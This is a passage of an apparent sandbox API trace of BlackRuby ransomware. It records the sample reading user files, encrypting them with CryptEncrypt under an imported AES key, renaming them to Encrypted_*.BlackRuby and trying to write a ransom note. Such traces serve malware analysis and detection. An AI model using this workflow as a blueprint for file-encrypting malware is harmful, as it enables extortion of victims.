(uMode=0x1) returned 0x0 [0051.215] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\q9n-amnqleo-9.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.215] GetLastError () returned 0x0 [0051.215] GetFileType (hFile=0x184) returned 0x1 [0051.215] SetErrorMode (uMode=0x0) returned 0x1 [0051.215] GetFileType (hFile=0x184) returned 0x1 [0051.215] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x13c6b [0051.215] GetLastError () returned 0x0 [0051.215] ReadFile (in: hFile=0x184, lpBuffer=0x1bf8974, nNumberOfBytesToRead=0x13c6b, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1bf8974*, lpNumberOfBytesRead=0x18ed18*=0x13c6b, lpOverlapped=0x0) returned 1 [0051.216] GetLastError () returned 0x0 [0051.216] CloseHandle (hObject=0x184) returned 1 [0051.216] GetLastError () returned 0x0 [0051.216] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", lpFilePart=0x0) returned 0x32 [0051.216] GetLastError () returned 0x0 [0051.216] SetErrorMode (uMode=0x1) returned 0x0 [0051.216] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\q9n-amnqleo-9.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f1c64b0, ftCreationTime.dwHighDateTime=0x1d35528, ftLastAccessTime.dwLowDateTime=0xa1811870, ftLastAccessTime.dwHighDateTime=0x1d34dc3, ftLastWriteTime.dwLowDateTime=0xa1811870, ftLastWriteTime.dwHighDateTime=0x1d34dc3, nFileSizeHigh=0x0, nFileSizeLow=0x13c6b)) returned 1 [0051.216] GetLastError () returned 0x0 [0051.216] SetErrorMode (uMode=0x0) returned 0x1 [0051.216] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c708) returned 1 [0051.217] GetLastError () returned 0x0 [0051.251] CryptImportKey (in: hProv=0x37c708, pbData=0x1c7a610, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360c20) returned 1 [0051.251] GetLastError () returned 0x0 [0051.251] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.251] GetLastError () returned 0x0 [0051.256] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.256] GetLastError () returned 0x0 [0051.256] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360f20) returned 1 [0051.256] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.256] GetLastError () returned 0x0 [0051.256] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1ca765c*=0x1, dwFlags=0x0) returned 1 [0051.256] GetLastError () returned 0x0 [0051.256] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1ca7628, dwFlags=0x0) returned 1 [0051.256] GetLastError () returned 0x0 [0051.256] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ca76a4*, pdwDataLen=0x18ed08*=0x13d60, dwBufLen=0x13d60 | out: pbData=0x1ca76a4*, pdwDataLen=0x18ed08*=0x13d60) returned 1 [0051.257] GetLastError () returned 0x0 [0051.257] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ccf190*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1ccf190*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.257] GetLastError () returned 0x0 [0051.257] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ccf1c0*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1ccf1c0*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.257] GetLastError () returned 0x0 [0051.257] CryptDestroyKey (hKey=0x360c20) returned 1 [0051.257] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.258] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.258] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", lpFilePart=0x0) returned 0x32 [0051.258] GetLastError () returned 0x0 [0051.258] SetErrorMode (uMode=0x1) returned 0x0 [0051.258] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\q9n-amnqleo-9.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.259] GetLastError () returned 0xb7 [0051.259] GetFileType (hFile=0x184) returned 0x1 [0051.259] SetErrorMode (uMode=0x0) returned 0x1 [0051.259] GetFileType (hFile=0x184) returned 0x1 [0051.261] CloseHandle (hObject=0x184) returned 1 [0051.261] GetLastError () returned 0xb7 [0051.261] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", lpFilePart=0x0) returned 0x32 [0051.261] GetLastError () returned 0xb7 [0051.261] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_kGlhMBnjtmOci04InUYaCE37oZ5XOErwof4ok.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_kGlhMBnjtmOci04InUYaCE37oZ5XOErwof4ok.BlackRuby", lpFilePart=0x0) returned 0x5a [0051.261] GetLastError () returned 0xb7 [0051.261] SetErrorMode (uMode=0x1) returned 0x0 [0051.261] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\q9n-amnqleo-9.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f1c64b0, ftCreationTime.dwHighDateTime=0x1d35528, ftLastAccessTime.dwLowDateTime=0xa1811870, ftLastAccessTime.dwHighDateTime=0x1d34dc3, ftLastWriteTime.dwLowDateTime=0x26c117a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x13d70)) returned 1 [0051.261] GetLastError () returned 0xb7 [0051.261] SetErrorMode (uMode=0x0) returned 0x1 [0051.261] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\q9n-amnqleo-9.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_kGlhMBnjtmOci04InUYaCE37oZ5XOErwof4ok.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_kglhmbnjtmoci04inuyace37oz5xoerwof4ok.blackruby")) returned 1 [0051.264] GetLastError () returned 0xb7 [0051.264] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.264] GetLastError () returned 0xb7 [0051.264] SetErrorMode (uMode=0x1) returned 0x0 [0051.264] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.264] GetLastError () returned 0x5 [0051.265] SetErrorMode (uMode=0x0) returned 0x1 [0051.265] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", lpFilePart=0x0) returned 0x2c [0051.265] GetLastError () returned 0x5 [0051.265] SetErrorMode (uMode=0x1) returned 0x0 [0051.265] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\qd7gddm.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1d00210 | out: lpFileInformation=0x1d00210*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7a231d60, ftCreationTime.dwHighDateTime=0x1d34cf0, ftLastAccessTime.dwLowDateTime=0x57f8f570, ftLastAccessTime.dwHighDateTime=0x1d34b65, ftLastWriteTime.dwLowDateTime=0x57f8f570, ftLastWriteTime.dwHighDateTime=0x1d34b65, nFileSizeHigh=0x0, nFileSizeLow=0x3b86)) returned 1 [0051.265] GetLastError () returned 0x5 [0051.265] SetErrorMode (uMode=0x0) returned 0x1 [0051.266] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", lpFilePart=0x0) returned 0x2c [0051.266] GetLastError () returned 0x5 [0051.266] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", lpFilePart=0x0) returned 0x2c [0051.266] GetLastError () returned 0x5 [0051.266] SetErrorMode (uMode=0x1) returned 0x0 [0051.266] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\qd7gddm.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.266] GetLastError () returned 0x0 [0051.266] GetFileType (hFile=0x184) returned 0x1 [0051.266] SetErrorMode (uMode=0x0) returned 0x1 [0051.266] GetFileType (hFile=0x184) returned 0x1 [0051.266] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x3b86 [0051.266] GetLastError () returned 0x0 [0051.266] ReadFile (in: hFile=0x184, lpBuffer=0x1d01f54, nNumberOfBytesToRead=0x3b86, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1d01f54*, lpNumberOfBytesRead=0x18ed18*=0x3b86, lpOverlapped=0x0) returned 1 [0051.267] GetLastError () returned 0x0 [0051.267] CloseHandle (hObject=0x184) returned 1 [0051.267] GetLastError () returned 0x0 [0051.267] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", lpFilePart=0x0) returned 0x2c [0051.267] GetLastError () returned 0x0 [0051.267] SetErrorMode (uMode=0x1) returned 0x0 [0051.267] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\qd7gddm.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7a231d60, ftCreationTime.dwHighDateTime=0x1d34cf0, ftLastAccessTime.dwLowDateTime=0x57f8f570, ftLastAccessTime.dwHighDateTime=0x1d34b65, ftLastWriteTime.dwLowDateTime=0x57f8f570, ftLastWriteTime.dwHighDateTime=0x1d34b65, nFileSizeHigh=0x0, nFileSizeLow=0x3b86)) returned 1 [0051.267] GetLastError () returned 0x0 [0051.267] SetErrorMode (uMode=0x0) returned 0x1 [0051.280] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b67f38, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ee0) returned 1 [0051.280] GetLastError () returned 0x0 [0051.280] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.280] GetLastError () returned 0x0 [0051.309] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.309] GetLastError () returned 0x0 [0051.309] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360fa0) returned 1 [0051.309] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.309] GetLastError () returned 0x0 [0051.309] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1b94f84*=0x1, dwFlags=0x0) returned 1 [0051.309] GetLastError () returned 0x0 [0051.309] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1b94f50, dwFlags=0x0) returned 1 [0051.309] GetLastError () returned 0x0 [0051.309] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b94fcc*, pdwDataLen=0x18ed08*=0x3c80, dwBufLen=0x3c80 | out: pbData=0x1b94fcc*, pdwDataLen=0x18ed08*=0x3c80) returned 1 [0051.309] GetLastError () returned 0x0 [0051.309] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b9c8f8*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b9c8f8*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.309] GetLastError () returned 0x0 [0051.309] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b9c928*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b9c928*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.309] GetLastError () returned 0x0 [0051.309] CryptDestroyKey (hKey=0x360ee0) returned 1 [0051.309] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.309] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.309] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", lpFilePart=0x0) returned 0x2c [0051.309] GetLastError () returned 0x0 [0051.309] SetErrorMode (uMode=0x1) returned 0x0 [0051.309] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\qd7gddm.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.310] GetLastError () returned 0xb7 [0051.310] GetFileType (hFile=0x184) returned 0x1 [0051.310] SetErrorMode (uMode=0x0) returned 0x1 [0051.310] GetFileType (hFile=0x184) returned 0x1 [0051.312] CloseHandle (hObject=0x184) returned 1 [0051.312] GetLastError () returned 0xb7 [0051.312] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp", lpFilePart=0x0) returned 0x2c [0051.312] GetLastError () returned 0xb7 [0051.312] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_wb1hXytOlSoEyXmMEAYoPihAhsUfJ8CsMJjA1ENMmp.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_wb1hXytOlSoEyXmMEAYoPihAhsUfJ8CsMJjA1ENMmp.BlackRuby", lpFilePart=0x0) returned 0x5f [0051.312] GetLastError () returned 0xb7 [0051.312] SetErrorMode (uMode=0x1) returned 0x0 [0051.312] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\qd7gddm.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7a231d60, ftCreationTime.dwHighDateTime=0x1d34cf0, ftLastAccessTime.dwLowDateTime=0x57f8f570, ftLastAccessTime.dwHighDateTime=0x1d34b65, ftLastWriteTime.dwLowDateTime=0x26ca9d20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x3c90)) returned 1 [0051.312] GetLastError () returned 0xb7 [0051.312] SetErrorMode (uMode=0x0) returned 0x1 [0051.312] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\qD7gddm.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\qd7gddm.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_wb1hXytOlSoEyXmMEAYoPihAhsUfJ8CsMJjA1ENMmp.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_wb1hxytolsoeyxmmeayopihahsufj8csmjja1enmmp.blackruby")) returned 1 [0051.313] GetLastError () returned 0xb7 [0051.313] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.313] GetLastError () returned 0xb7 [0051.313] SetErrorMode (uMode=0x1) returned 0x0 [0051.313] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.314] GetLastError () returned 0x5 [0051.314] SetErrorMode (uMode=0x0) returned 0x1 [0051.314] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", lpFilePart=0x0) returned 0x2f [0051.314] GetLastError () returned 0x5 [0051.315] SetErrorMode (uMode=0x1) returned 0x0 [0051.315] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\r0ebeehigi.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1bc5184 | out: lpFileInformation=0x1bc5184*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb3c6c2f0, ftCreationTime.dwHighDateTime=0x1d34fbc, ftLastAccessTime.dwLowDateTime=0xa2bf9190, ftLastAccessTime.dwHighDateTime=0x1d358a8, ftLastWriteTime.dwLowDateTime=0xa2bf9190, ftLastWriteTime.dwHighDateTime=0x1d358a8, nFileSizeHigh=0x0, nFileSizeLow=0x4c94)) returned 1 [0051.315] GetLastError () returned 0x5 [0051.315] SetErrorMode (uMode=0x0) returned 0x1 [0051.315] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", lpFilePart=0x0) returned 0x2f [0051.315] GetLastError () returned 0x5 [0051.315] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", lpFilePart=0x0) returned 0x2f [0051.315] GetLastError () returned 0x5 [0051.315] SetErrorMode (uMode=0x1) returned 0x0 [0051.315] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\r0ebeehigi.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.315] GetLastError () returned 0x0 [0051.315] GetFileType (hFile=0x184) returned 0x1 [0051.315] SetErrorMode (uMode=0x0) returned 0x1 [0051.315] GetFileType (hFile=0x184) returned 0x1 [0051.315] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x4c94 [0051.315] GetLastError () returned 0x0 [0051.315] ReadFile (in: hFile=0x184, lpBuffer=0x1bc6dc8, nNumberOfBytesToRead=0x4c94, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1bc6dc8*, lpNumberOfBytesRead=0x18ed18*=0x4c94, lpOverlapped=0x0) returned 1 [0051.317] GetLastError () returned 0x0 [0051.317] CloseHandle (hObject=0x184) returned 1 [0051.317] GetLastError () returned 0x0 [0051.317] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", lpFilePart=0x0) returned 0x2f [0051.317] GetLastError () returned 0x0 [0051.317] SetErrorMode (uMode=0x1) returned 0x0 [0051.317] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\r0ebeehigi.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb3c6c2f0, ftCreationTime.dwHighDateTime=0x1d34fbc, ftLastAccessTime.dwLowDateTime=0xa2bf9190, ftLastAccessTime.dwHighDateTime=0x1d358a8, ftLastWriteTime.dwLowDateTime=0xa2bf9190, ftLastWriteTime.dwHighDateTime=0x1d358a8, nFileSizeHigh=0x0, nFileSizeLow=0x4c94)) returned 1 [0051.317] GetLastError () returned 0x0 [0051.317] SetErrorMode (uMode=0x0) returned 0x1 [0051.328] CryptImportKey (in: hProv=0x37c790, pbData=0x1c2aaa0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360de0) returned 1 [0051.328] GetLastError () returned 0x0 [0051.328] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.328] GetLastError () returned 0x0 [0051.333] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.333] GetLastError () returned 0x0 [0051.333] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360f60) returned 1 [0051.333] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.333] GetLastError () returned 0x0 [0051.333] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1c57aec*=0x1, dwFlags=0x0) returned 1 [0051.333] GetLastError () returned 0x0 [0051.333] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1c57ab8, dwFlags=0x0) returned 1 [0051.333] GetLastError () returned 0x0 [0051.334] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c57b34*, pdwDataLen=0x18ed08*=0x4d90, dwBufLen=0x4d90 | out: pbData=0x1c57b34*, pdwDataLen=0x18ed08*=0x4d90) returned 1 [0051.334] GetLastError () returned 0x0 [0051.334] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c61680*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c61680*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.334] GetLastError () returned 0x0 [0051.334] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c616b0*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c616b0*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.334] GetLastError () returned 0x0 [0051.334] CryptDestroyKey (hKey=0x360de0) returned 1 [0051.334] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.334] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.334] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", lpFilePart=0x0) returned 0x2f [0051.334] GetLastError () returned 0x0 [0051.334] SetErrorMode (uMode=0x1) returned 0x0 [0051.336] GetFileType (hFile=0x184) returned 0x1 [0051.336] SetErrorMode (uMode=0x0) returned 0x1 [0051.336] GetFileType (hFile=0x184) returned 0x1 [0051.336] WriteFile (in: hFile=0x184, lpBuffer=0x1c6b20c*, nNumberOfBytesToWrite=0x4da0, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1c6b20c*, lpNumberOfBytesWritten=0x18ed24*=0x4da0, lpOverlapped=0x0) returned 1 [0051.339] GetLastError () returned 0xb7 [0051.339] CloseHandle (hObject=0x184) returned 1 [0051.339] GetLastError () returned 0xb7 [0051.339] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv", lpFilePart=0x0) returned 0x2f [0051.339] GetLastError () returned 0xb7 [0051.339] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_jR3vc2TD66VXQR98NRl4we8mvIbeATalYjl7.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: 